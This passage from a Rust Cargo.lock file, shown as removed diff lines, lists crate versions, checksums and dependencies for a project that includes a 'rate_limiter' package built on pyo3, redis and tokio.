"serde_json", - "tinytemplate", - "walkdir", -] - -[[package]] -name = "criterion-plot" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8d80a2f4f5b554395e47b5d8305bc3d27813bacb73493eb1001e8f76dae29ea" -dependencies = [ - "cast", - "itertools 0.13.0", -] - -[[package]] -name = "crossbeam-deque" -version = "0.8.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51" -dependencies = [ - "crossbeam-epoch", - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-epoch" -version = "0.9.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e" -dependencies = [ - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-utils" -version = "0.8.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28" - -[[package]] -name = "crunchy" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5" - -[[package]] -name = "deranged" -version = "0.5.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7cd812cc2bc1d69d4764bd80df88b4317eaef9e773c75226407d9bc0876b211c" -dependencies = [ - "powerfmt", -] - -[[package]] -name = "displaydoc" -version = "0.2.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "either" -version = "1.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" - -[[package]] -name = "equivalent" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" - -[[package]] -name = "find-msvc-tools" -version = "0.1.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" - -[[package]] -name = "form_urlencoded" -version = "1.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cb4cb245038516f5f85277875cdaa4f7d2c9a0fa0468de06ed190163b1581fcf" -dependencies = [ - "percent-encoding", -] - -[[package]] -name = "futures-channel" -version = "0.3.32" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "07bbe89c50d7a535e539b8c17bc0b49bdb77747034daa8087407d655f3f7cc1d" -dependencies = [ - "futures-core", -] - -[[package]] -name = "futures-core" -version = "0.3.32" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e3450815272ef58cec6d564423f6e755e25379b217b0bc688e295ba24df6b1d" - -[[package]] -name = "futures-macro" -version = "0.3.32" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e835b70203e41293343137df5c0664546da5745f82ec9b84d40be8336958447b" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "futures-sink" -version = "0.3.32" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c39754e157331b013978ec91992bde1ac089843443c49cbc7f46150b0fad0893" - -[[package]] -name = "futures-task" -version = "0.3.32" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393" - -[[package]] -name = "futures-util" -version = "0.3.32" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "389ca41296e6190b48053de0321d02a77f32f8a5d2461dd38762c0593805c6d6" -dependencies = [ - "futures-core", - "futures-macro", - "futures-sink", - "futures-task", - "pin-project-lite", - "slab", -] - -[[package]] -name = "getopts" -version = "0.2.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cfe4fbac503b8d1f88e6676011885f34b7174f46e59956bba534ba83abded4df" -dependencies = [ - "unicode-width", -] - -[[package]] -name = "getrandom" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" -dependencies = [ - "cfg-if", - "libc", - "wasi", -] - -[[package]] -name = "half" -version = "2.7.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b" -dependencies = [ - "cfg-if", - "crunchy", - "zerocopy", -] - -[[package]] -name = "hashbrown" -version = "0.16.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" - -[[package]] -name = "heck" -version = "0.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" - -[[package]] -name = "iana-time-zone" -version = "0.1.65" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" -dependencies = [ - "android_system_properties", - "core-foundation-sys", - "iana-time-zone-haiku", - "js-sys", - "log", - "wasm-bindgen", - "windows-core", -] - -[[package]] -name = "iana-time-zone-haiku" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f" -dependencies = [ - "cc", -] - -[[package]] -name = "icu_collections" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4c6b649701667bbe825c3b7e6388cb521c23d88644678e83c0c4d0a621a34b43" -dependencies = [ - "displaydoc", - "potential_utf", - "yoke", - "zerofrom", - "zerovec", -] - -[[package]] -name = "icu_locale_core" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "edba7861004dd3714265b4db54a3c390e880ab658fec5f7db895fae2046b5bb6" -dependencies = [ - "displaydoc", - "litemap", - "tinystr", - "writeable", - "zerovec", -] - -[[package]] -name = "icu_normalizer" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5f6c8828b67bf8908d82127b2054ea1b4427ff0230ee9141c54251934ab1b599" -dependencies = [ - "icu_collections", - "icu_normalizer_data", - "icu_properties", - "icu_provider", - "smallvec", - "zerovec", -] - -[[package]] -name = "icu_normalizer_data" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7aedcccd01fc5fe81e6b489c15b247b8b0690feb23304303a9e560f37efc560a" - -[[package]] -name = "icu_properties" -version = "2.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "020bfc02fe870ec3a66d93e677ccca0562506e5872c650f893269e08615d74ec" -dependencies = [ - "icu_collections", - "icu_locale_core", - "icu_properties_data", - "icu_provider", - "zerotrie", - "zerovec", -] - -[[package]] -name = "icu_properties_data" -version = "2.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "616c294cf8d725c6afcd8f55abc17c56464ef6211f9ed59cccffe534129c77af" - -[[package]] -name = "icu_provider" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85962cf0ce02e1e0a629cc34e7ca3e373ce20dda4c4d7294bbd0bf1fdb59e614" -dependencies = [ - "displaydoc", - "icu_locale_core", - "writeable", - "yoke", - "zerofrom", - "zerotrie", - "zerovec", -] - -[[package]] -name = "idna" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b0875f23caa03898994f6ddc501886a45c7d3d62d04d2d90788d47be1b1e4de" -dependencies = [ - "idna_adapter", - "smallvec", - "utf8_iter", -] - -[[package]] -name = "idna_adapter" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3acae9609540aa318d1bc588455225fb2085b9ed0c4f6bd0d9d5bcd86f1a0344" -dependencies = [ - "icu_normalizer", - "icu_properties", -] - -[[package]] -name = "indexmap" -version = "2.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" -dependencies = [ - "equivalent", - "hashbrown", -] - -[[package]] -name = "inventory" -version = "0.3.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "009ae045c87e7082cb72dab0ccd01ae075dd00141ddc108f43a0ea150a9e7227" -dependencies = [ - "rustversion", -] - -[[package]] -name = "is-macro" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d57a3e447e24c22647738e4607f1df1e0ec6f72e16182c4cd199f647cdfb0e4" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "itertools" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c173a5686ce8bfa551b3563d0c2170bf24ca44da99c7ca4bfdab5418c3fe57" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.14.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285" -dependencies = [ - "either", -] - -[[package]] -name = "itoa" -version = "1.0.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682" - -[[package]] -name = "js-sys" -version = "0.3.91" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b49715b7073f385ba4bc528e5747d02e66cb39c6146efb66b781f131f0fb399c" -dependencies = [ - "once_cell", - "wasm-bindgen", -] - -[[package]] -name = "lalrpop-util" -version = "0.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "507460a910eb7b32ee961886ff48539633b788a36b65692b95f225b844c82553" - -[[package]] -name = "libc" -version = "0.2.183" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5b646652bf6661599e1da8901b3b9522896f01e736bad5f723fe7a3a27f899d" - -[[package]] -name = "litemap" -version = "0.8.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6373607a59f0be73a39b6fe456b8192fcc3585f602af20751600e974dd455e77" - -[[package]] -name = "lock_api" -version = "0.4.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "224399e74b87b5f3557511d98dff8b14089b3dadafcab6bb93eab67d3aace965" -dependencies = [ - "scopeguard", -] - -[[package]] -name = "log" -version = "0.4.29" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" - -[[package]] -name = "maplit" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" - -[[package]] -name = "matrixmultiply" -version = "0.3.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a06de3016e9fae57a36fd14dba131fccf49f74b40b7fbdb472f96e361ec71a08" -dependencies = [ - "autocfg", - "rawpointer", -] - -[[package]] -name = "memchr" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" - -[[package]] -name = "mio" -version = "1.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a69bcab0ad47271a0234d9422b131806bf3968021e5dc9328caf2d4cd58557fc" -dependencies = [ - "libc", - "wasi", - "windows-sys 0.61.2", -] - -[[package]] -name = "ndarray" -version = "0.17.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "520080814a7a6b4a6e9070823bb24b4531daac8c4627e08ba5de8c5ef2f2752d" -dependencies = [ - "matrixmultiply", - "num-complex", - "num-integer", - "num-traits", - "portable-atomic", - "portable-atomic-util", - "rawpointer", -] - -[[package]] -name = "num-bigint" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5e44f723f1133c9deac646763579fdb3ac745e418f2a7af9cd0c431da1f20b9" -dependencies = [ - "num-integer", - "num-traits", -] - -[[package]] -name = "num-complex" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "73f88a1307638156682bada9d7604135552957b7818057dcef22705b4d509495" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-conv" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf97ec579c3c42f953ef76dbf8d55ac91fb219dde70e49aa4a6b7d74e9919050" - -[[package]] -name = "num-integer" -version = "0.1.46" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7969661fd2958a5cb096e56c8e1ad0444ac2bbcd0061bd28660485a44879858f" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-traits" -version = "0.2.19" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" -dependencies = [ - "autocfg", -] - -[[package]] -name = "numpy" -version = "0.28.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "778da78c64ddc928ebf5ad9df5edf0789410ff3bdbf3619aed51cd789a6af1e2" -dependencies = [ - "libc", - "ndarray", - "num-complex", - "num-integer", - "num-traits", - "pyo3", - "pyo3-build-config", - "rustc-hash 2.1.1", -] - -[[package]] -name = "once_cell" -version = "1.21.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50" - -[[package]] -name = "oorandom" -version = "11.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d6790f58c7ff633d8771f42965289203411a5e5c68388703c06e14f24770b41e" - -[[package]] -name = "ordered-float" -version = "5.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f4779c6901a562440c3786d08192c6fbda7c1c2060edd10006b05ee35d10f2d" -dependencies = [ - "num-traits", -] - -[[package]] -name = "page_size" -version = "0.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30d5b2194ed13191c1999ae0704b7839fb18384fa22e49b57eeaa97d79ce40da" -dependencies = [ - "libc", - "winapi", -] - -[[package]] -name = "parking_lot" -version = "0.12.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "93857453250e3077bd71ff98b6a65ea6621a19bb0f559a85248955ac12c45a1a" -dependencies = [ - "lock_api", - "parking_lot_core", -] - -[[package]] -name = "parking_lot_core" -version = "0.9.12" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2621685985a2ebf1c516881c026032ac7deafcda1a2c9b7850dc81e3dfcb64c1" -dependencies = [ - "cfg-if", - "libc", - "redox_syscall", - "smallvec", - "windows-link", -] - -[[package]] -name = "percent-encoding" -version = "2.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9b4f627cb1b25917193a259e49bdad08f671f8d9708acfd5fe0a8c1455d87220" - -[[package]] -name = "phf" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078" -dependencies = [ - "phf_shared", -] - -[[package]] -name = "phf_codegen" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a" -dependencies = [ - "phf_generator", - "phf_shared", -] - -[[package]] -name = "phf_generator" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" -dependencies = [ - "phf_shared", - "rand", -] - -[[package]] -name = "phf_shared" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67eabc2ef2a60eb7faa00097bd1ffdb5bd28e62bf39990626a582201b7a754e5" -dependencies = [ - "siphasher", -] - -[[package]] -name = "pin-project-lite" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a89322df9ebe1c1578d689c92318e070967d1042b512afbe49518723f4e6d5cd" - -[[package]] -name = "plotters" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aeb6f403d7a4911efb1e33402027fc44f29b5bf6def3effcc22d7bb75f2b747" -dependencies = [ - "num-traits", - "plotters-backend", - "plotters-svg", - "wasm-bindgen", - "web-sys", -] - -[[package]] -name = "plotters-backend" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "df42e13c12958a16b3f7f4386b9ab1f3e7933914ecea48da7139435263a4172a" - -[[package]] -name = "plotters-svg" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51bae2ac328883f7acdfea3d66a7c35751187f870bc81f94563733a154d7a670" -dependencies = [ - "plotters-backend", -] - -[[package]] -name = "portable-atomic" -version = "1.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" - -[[package]] -name = "portable-atomic-util" -version = "0.2.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "091397be61a01d4be58e7841595bd4bfedb15f1cd54977d79b8271e94ed799a3" -dependencies = [ - "portable-atomic", -] - -[[package]] -name = "potential_utf" -version = "0.1.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b73949432f5e2a09657003c25bca5e19a0e9c84f8058ca374f49e0ebe605af77" -dependencies = [ - "zerovec", -] - -[[package]] -name = "powerfmt" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391" - -[[package]] -name = "ppv-lite86" -version = "0.2.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9" -dependencies = [ - "zerocopy", -] - -[[package]] -name = "proc-macro2" -version = "1.0.106" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "pyo3" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf85e27e86080aafd5a22eae58a162e133a589551542b3e5cee4beb27e54f8e1" -dependencies = [ - "libc", - "once_cell", - "portable-atomic", - "pyo3-build-config", - "pyo3-ffi", - "pyo3-macros", -] - -[[package]] -name = "pyo3-async-runtimes" -version = "0.28.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9e7364a95bf00e8377bbf9b0f09d7ff9715a29d8fcf93b47d1a967363b973178" -dependencies = [ - "futures-channel", - "futures-util", - "once_cell", - "pin-project-lite", - "pyo3", - "tokio", -] - -[[package]] -name = "pyo3-build-config" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bf94ee265674bf76c09fa430b0e99c26e319c945d96ca0d5a8215f31bf81cf7" -dependencies = [ - "target-lexicon", -] - -[[package]] -name = "pyo3-ffi" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "491aa5fc66d8059dd44a75f4580a2962c1862a1c2945359db36f6c2818b748dc" -dependencies = [ - "libc", - "pyo3-build-config", -] - -[[package]] -name = "pyo3-log" -version = "0.13.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "26c2ec80932c5c3b2d4fbc578c9b56b2d4502098587edb8bef5b6bfcad43682e" -dependencies = [ - "arc-swap", - "log", - "pyo3", -] - -[[package]] -name = "pyo3-macros" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f5d671734e9d7a43449f8480f8b38115df67bef8d21f76837fa75ee7aaa5e52e" -dependencies = [ - "proc-macro2", - "pyo3-macros-backend", - "quote", - "syn", -] - -[[package]] -name = "pyo3-macros-backend" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22faaa1ce6c430a1f71658760497291065e6450d7b5dc2bcf254d49f66ee700a" -dependencies = [ - "heck", - "proc-macro2", - "pyo3-build-config", - "quote", - "syn", -] - -[[package]] -name = "pyo3-stub-gen" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b159f7704044f57d058f528a6f1f22a0a0a327dcb595c5fb38beae658e0338d6" -dependencies = [ - "anyhow", - "chrono", - "either", - "indexmap", - "inventory", - "itertools 0.14.0", - "log", - "maplit", - "num-complex", - "numpy", - "ordered-float", - "pyo3", - "pyo3-stub-gen-derive", - "rustpython-parser", - "serde", - "serde_json", - "time", - "toml", -] - -[[package]] -name = "pyo3-stub-gen-derive" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c79e7c5b1fcec7c39ab186594658a971c59911eb6fbab5a5932cf2318534be" -dependencies = [ - "heck", - "indexmap", - "proc-macro2", - "quote", - "rustpython-parser", - "syn", -] - -[[package]] -name = "quote" -version = "1.0.45" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41f2619966050689382d2b44f664f4bc593e129785a36d6ee376ddf37259b924" -dependencies = [ - "proc-macro2", -] - -[[package]] -name = "rand" -version = "0.8.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" -dependencies = [ - "getrandom", -] - -[[package]] -name = "rate_limiter" -version = "0.1.0" -dependencies = [ - "criterion", - "log", - "parking_lot", - "pyo3", - "pyo3-async-runtimes", - "pyo3-log", - "pyo3-stub-gen", - "redis", - "thiserror", - "tokio", -] - -[[package]] -name = "rawpointer" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60a357793950651c4ed0f3f52338f53b2f809f32d83a07f72909fa13e4c6c1e3" - -[[package]] -name = "rayon" -version = "1.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "368f01d005bf8fd9b1206fb6fa653e6c4a81ceb1466406b81792d87c5677a58f" -dependencies = [ - "either", - "rayon-core", -] - -[[package]] -name = "rayon-core" -version = "1.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22e18b0f0062d30d4230b2e85ff77fdfe4326feb054b9783a3460d8435c8ab91" -dependencies = [ - "crossbeam-deque", - "crossbeam-utils", -] - -[[package]] -name = "redis" -version = "0.27.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "09d8f99a4090c89cc489a94833c901ead69bfbf3877b4867d5482e321ee875bc" -dependencies = [ - "arc-swap", - "async-trait", - "bytes", - "combine", - "futures-util", - "itertools 0.13.0", - "itoa", - "num-bigint", - "percent-encoding", - "pin-project-lite", - "ryu", - "sha1_smol", - "socket2 0.5.10", - "tokio", - "tokio-util", - "url", -] - -[[package]] -name = "redox_syscall" -version = "0.5.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ed2bf2547551a7053d6fdfafda3f938979645c44812fbfcda098faae3f1a362d" -dependencies = [ - "bitflags", -] - -[[package]] -name = "regex" -version = "1.12.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276" -dependencies = [ - "aho-corasick", - "memchr", - "regex-automata", - "regex-syntax", -] - -[[package]] -name = "regex-automata" -version = "0.4.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f" -dependencies = [ - "aho-corasick", - "memchr", - "regex-syntax", -] - -[[package]] -name = "regex-syntax" -version = "0.8.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dc897dd8d9e8bd1ed8cdad82b5966c3e0ecae09fb1907d58efaa013543185d0a" - -[[package]] -name = "rustc-hash" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" - -[[package]] -name = "rustc-hash" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" - -[[package]] -name = "rustpython-ast" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4cdaf8ee5c1473b993b398c174641d3aa9da847af36e8d5eb8291930b72f31a5" -dependencies = [ - "is-macro", - "num-bigint", - "rustpython-parser-core", - "static_assertions", -] - -[[package]] -name = "rustpython-parser" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "868f724daac0caf9bd36d38caf45819905193a901e8f1c983345a68e18fb2abb" -dependencies = [ - "anyhow", - "is-macro", - "itertools 0.11.0", - "lalrpop-util", - "log", - "num-bigint", - "num-traits", - "phf", - "phf_codegen", - "rustc-hash 1.1.0", - "rustpython-ast", - "rustpython-parser-core", - "tiny-keccak", - "unic-emoji-char", - "unic-ucd-ident", - "unicode_names2", -] - -[[package]] -name = "rustpython-parser-core" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4b6c12fa273825edc7bccd9a734f0ad5ba4b8a2f4da5ff7efe946f066d0f4ad" -dependencies = [ - "is-macro", - "memchr", - "rustpython-parser-vendored", -] - -[[package]] -name = "rustpython-parser-vendored" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "04fcea49a4630a3a5d940f4d514dc4f575ed63c14c3e3ed07146634aed7f67a6" -dependencies = [ - "memchr", - "once_cell", -] - -[[package]] -name = "rustversion" -version = "1.0.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" - -[[package]] -name = "ryu" -version = "1.0.23" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f" - -[[package]] -name = "same-file" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -dependencies = [ - "winapi-util", -] - -[[package]] -name = "scopeguard" -version = "1.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49" - -[[package]] -name = "serde" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" -dependencies = [ - "serde_core", - "serde_derive", -] - -[[package]] -name = "serde_core" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" -dependencies = [ - "serde_derive", -] - -[[package]] -name = "serde_derive" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "serde_json" -version = "1.0.149" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" -dependencies = [ - "itoa", - "memchr", - "serde", - "serde_core", - "zmij", -] - -[[package]] -name = "serde_spanned" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8bbf91e5a4d6315eee45e704372590b30e260ee83af6639d64557f51b067776" -dependencies = [ - "serde_core", -] - -[[package]] -name = "sha1_smol" -version = "1.0.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bbfa15b3dddfee50a0fff136974b3e1bde555604ba463834a7eb7deb6417705d" - -[[package]] -name = "shlex" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" - -[[package]] -name = "siphasher" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" - -[[package]] -name = "slab" -version = "0.4.12" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0c790de23124f9ab44544d7ac05d60440adc586479ce501c1d6d7da3cd8c9cf5" - -[[package]] -name = "smallvec" -version = "1.15.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 